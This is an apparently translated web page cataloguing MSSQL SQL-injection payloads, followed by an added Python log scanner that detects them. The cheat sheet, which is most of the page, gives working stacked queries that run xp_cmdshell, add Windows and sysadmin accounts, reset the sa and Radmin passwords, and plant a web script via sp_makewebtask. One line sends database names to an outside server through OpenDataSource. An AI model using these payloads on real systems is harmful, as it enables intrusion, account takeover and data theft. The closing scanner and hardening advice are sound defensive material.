Common injection commands

Source: Internet
Author: User

// Source: z: zhu


// Check the permissions.

And 1=(Select IS_MEMBER('db_owner'))

And char(124)+Cast(IS_MEMBER('db_owner') as varchar(1))+char(124)=1;--

// Check whether you have the permission to read a database

And 1=(Select HAS_DBACCESS('master'))

And char(124)+Cast(HAS_DBACCESS('master') as varchar(1))+char(124)=1--

Numeric type

And char(124)+user+char(124)=0

Character Type

' And char(124)+user+char(124)=0 and ''='

Search type

' And char(124)+user+char(124)=0 and '%'='

Extract the username

And user>0

' And user>0 and ''='

Check whether the login is sa (sysadmin)

And 1=(select IS_SRVROLEMEMBER('sysadmin'));--

And char(124)+Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1--

Check whether the database is MSSQL

And exists (select * from sysobjects);--

Check whether stacked (multiple) statements are supported

;Declare @d int;--

Restore xp_cmdshell

;Exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

Select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafsp','select @@version')

//-----------------------

// Execute the command

//-----------------------

First, enable the sandbox mode:

Exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

Then run the system command through the Jet OLE DB provider:

Select * from openrowset('Microsoft.Jet.OLEDB.4.0',';database=c:\winnt\system32\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

Execute Command

;DECLARE @shell int exec SP_OAcreate 'wscript.shell',@shell output exec SP_OAMETHOD @shell,'run',null,'c:\WINNT\system32\cmd.exe /C net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'COMMAND /c md c:\123'

Determine whether the xp_cmdshell extended stored procedure exists:

http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype='X' AND name='xp_cmdshell')

Write registry

Exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ

Read Registry

Exec master..xp_regread 'HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

Read directory content

Exec master..xp_dirtree 'C:\winnt\system32\',1,1

Database Backup

Backup database pubs to disk='C:\123.bak'

// Extract the row count of a table

And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From D99_Tmp)=0;--

To change the sa password, run the following command:

Exec sp_password NULL,'new password','sa'

Create a login named test (password ptlove) and add it to the sysadmin role:

Exec master.dbo.sp_addlogin test,ptlove

Exec master.dbo.sp_addsrvrolemember test,sysadmin

Drop the xp_cmdshell extended stored procedure:

Exec sp_dropextendedproc 'xp_cmdshell'

Add an extended stored procedure

EXEC [master]..sp_addextendedproc 'xp_proxiedadata','c:\winnt\system32\sqllog.dll'

GRANT exec On xp_proxiedadata TO public

Stop or start a service:

Exec master..xp_servicecontrol 'stop','schedule'

Exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

Lists only the subdirectories of a directory.

xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

Compresses several files into one target cabinet file.

All files to be compressed are appended to the end of the parameter list, separated by commas.

dbo.xp_makecab 'C:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

Stops a running program; the process ID must be supplied as the parameter.

In Task Manager, choose View > Select Columns to display the process ID of each running program.

xp_terminate_process 2484

xp_unpackcab

Uncompresses a cabinet file.

xp_unpackcab 'C:\test.cab','c:\temp',1

On a machine with Radmin installed, the Radmin password had been changed, regedit.exe could not be found (deleted or renamed) and net.exe did not exist, so there was no way to import a registration file with regedit /e; MSSQL, however, was running with sa permissions. Running

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','System\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c

changes the Radmin password to 12345678. To change the port value, run

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','System\RAdmin\v2.0\Server\Parameters','Port','REG_BINARY',0xd20400

which sets the port to 1234.

Create database lcx;

Create TABLE ku (name nvarchar(256) null);

Create TABLE biao (id int NULL, name nvarchar(256) null);

// Obtain the Database Name

Insert into OpenDataSource('sqloledb','server=211.39.145.163,1443;uid=test;Pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

// Create a table in master to check the permissions

Create Table master..d_test (id nvarchar(4000) null, data nvarchar(4000) null);--

Use sp_makewebtask to write a file (a one-line script) directly into the web directory:

http://127.0.0.1/dblogin123.asp?username=123';Exec%20sp_makewebtask%20'd:\www\TT\88.asp','%20select%20'''%20';--

// Update table content

Update films set kind='dramatic' Where id=123

// Delete content

Delete from table_name where stockid=3
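From the defender's side, the probes and stacked procedure calls catalogued above (the IS_MEMBER/HAS_DBACCESS/IS_SRVROLEMEMBER checks, the char(124)+...+char(124) error-based extraction, user>0, the ;exec ... xp_cmdshell / sp_OACreate / xp_regwrite / sp_makewebtask / sp_addlogin family) all arrive URL-encoded in web-server access logs. The following is an added example, not code from the original page: a Python scanner that normalizes each request's query string (URL decoding, decoding of 0x... hex literals such as the UTF-16LE 'sysadmin' in the IS_SRVROLEMEMBER probe, whitespace collapsing, lower-casing) and then matches signatures. The log lines, the category labels and the signature set are constructed for this example.

```python
"""Scan constructed access-log lines for the MSSQL injection probes listed above."""
import re
from urllib.parse import unquote, unquote_plus

# Signature families (labels are this example's own, not a standard taxonomy).
SIGNATURES = {
    "privilege probe": re.compile(r"\b(is_member|has_dbaccess|is_srvrolemember)\s*\("),
    "error-based extraction": re.compile(r"char\s*\(\s*124\s*\)\s*\+"),
    "login enumeration": re.compile(r"\buser\s*>\s*0"),
    "stacked query": re.compile(r";\s*(declare|exec|execute|backup|create|insert|update|delete)\b"),
    "command execution": re.compile(r"\b(xp_cmdshell|sp_oacreate|sp_oamethod|openrowset|opendatasource)\b"),
    "system extended procedure": re.compile(
        r"\b(xp_regwrite|xp_regread|xp_dirtree|xp_subdirs|xp_getfiledetails|xp_makecab|"
        r"xp_unpackcab|xp_terminate_process|xp_servicecontrol|sp_makewebtask)\b"),
    "extended-proc management": re.compile(r"\b(sp_addextendedproc|sp_dropextendedproc)\b"),
    "account manipulation": re.compile(r"\b(sp_password|sp_addlogin|sp_addsrvrolemember)\b"),
}

HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2})+)", re.IGNORECASE)
LOG_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')


def url_decode(value, max_rounds=3):
    """Undo form/URL encoding; extra rounds catch double-encoded payloads.
    Only the first round treats '+' as a space, so a decoded %2B '+' survives."""
    value = unquote_plus(value)
    for _ in range(max_rounds - 1):
        again = unquote(value)
        if again == value:
            break
        value = again
    return value


def _hex_to_literal(match):
    """Turn 0x... into a quoted string when it decodes as UTF-16LE or ASCII text."""
    raw = bytes.fromhex(match.group(1))
    if len(raw) % 2 == 0 and raw[1::2] == b"\x00" * (len(raw) // 2):
        try:
            return "'" + raw.decode("utf-16-le") + "'"
        except UnicodeDecodeError:
            pass
    try:
        text = raw.decode("ascii")
        if text.isprintable():
            return "'" + text + "'"
    except UnicodeDecodeError:
        pass
    return match.group(0)  # binary blob (e.g. a REG_BINARY value): leave as-is


def decode_hex_literals(text):
    return HEX_LITERAL.sub(_hex_to_literal, text)


def normalize(query_string):
    """Canonical form used for matching: decoded, hex literals resolved, one space, lower-case."""
    text = decode_hex_literals(url_decode(query_string))
    return re.sub(r"\s+", " ", text).strip().lower()


def scan(lines):
    """Return (path, [matched families], normalized query) for each suspicious request."""
    findings = []
    for line in lines:
        match = LOG_RE.search(line)
        if not match:
            continue
        path, _, query = match.group("url").partition("?")
        if not query:
            continue
        norm = normalize(query)
        hits = [name for name, rx in SIGNATURES.items() if rx.search(norm)]
        if hits:
            findings.append((path, hits, norm))
    return findings


# Constructed sample entries (Apache combined format); 192.0.2.10 is a documentation address.
LOG_LINES = [
    r'192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /display.asp?keyno=188 HTTP/1.1" 200 512',
    r'192.0.2.10 - - [10/Oct/2023:13:55:37 +0000] "GET /display.asp?keyno=188%20and%20char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1-- HTTP/1.1" 500 231',
    r'192.0.2.10 - - [10/Oct/2023:13:55:38 +0000] "GET /display.asp?keyno=188;exec%20master..xp_cmdshell%20%27dir%27-- HTTP/1.1" 200 512',
    r'192.0.2.10 - - [10/Oct/2023:13:55:39 +0000] "GET /dblogin123.asp?username=123%27;Exec%20sp_makewebtask%20%27d:\www\TT\88.asp%27,%27%20select%20%27%27%27%20%27;-- HTTP/1.1" 200 87',
    r'192.0.2.10 - - [10/Oct/2023:13:55:40 +0000] "GET /list.asp?name=a%27%20and%20user%3E0%20and%20%27%27%3D HTTP/1.1" 500 231',
]

if __name__ == "__main__":
    for path, hits, norm in scan(LOG_LINES):
        print(f"{path}: {', '.join(hits)}\n    {norm}")
```

The hex-literal step matters because the cheat sheet itself shows the role name passed as 0x7300...6E00 rather than 'sysadmin'; a keyword rule that only looks at the raw request misses that variant, while the normalized form still contains is_srvrolemember('sysadmin'). Pair this request-side check with database-side auditing of failed type-conversion errors (the char(124)+... probes deliberately trigger them) and with keeping xp_cmdshell, Ole Automation and ad hoc distributed queries disabled.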
